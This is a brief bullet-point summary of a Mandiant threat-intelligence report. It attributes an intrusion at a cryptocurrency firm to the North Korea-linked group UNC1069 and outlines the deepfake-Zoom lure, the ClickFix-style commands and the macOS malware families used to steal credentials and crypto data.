Overview
- Google Mandiant attributes a recent intrusion at a cryptocurrency firm to UNC1069, a North Korea-linked group seeking financial gain through data theft from Windows and macOS systems.
- The operation used a compromised Telegram account posing as a crypto executive to share a Calendly invite that redirected victims to an attacker-hosted page mimicking Zoom with AI-generated or deepfake video.
- Victims were instructed to run ClickFix-style troubleshooting commands that delivered an AppleScript dropping the WAVESHAPER binary, which then staged HYPERCALL, HIDDENCALL, and SUGARLOADER.
- Up to seven macOS malware families were deployed, including newly observed DEEPBREATH, CHROMEPUSH, and SILENCELIFT that bypass macOS protections to exfiltrate keychain entries, browser data, Telegram content, and Apple Notes.
- Mandiant highlights unusually heavy tooling per host to harvest credentials and session tokens for cryptocurrency theft, noting the group’s shift since 2023 toward Web3 and crypto targets and overlap with Kaspersky’s GhostCall tracking.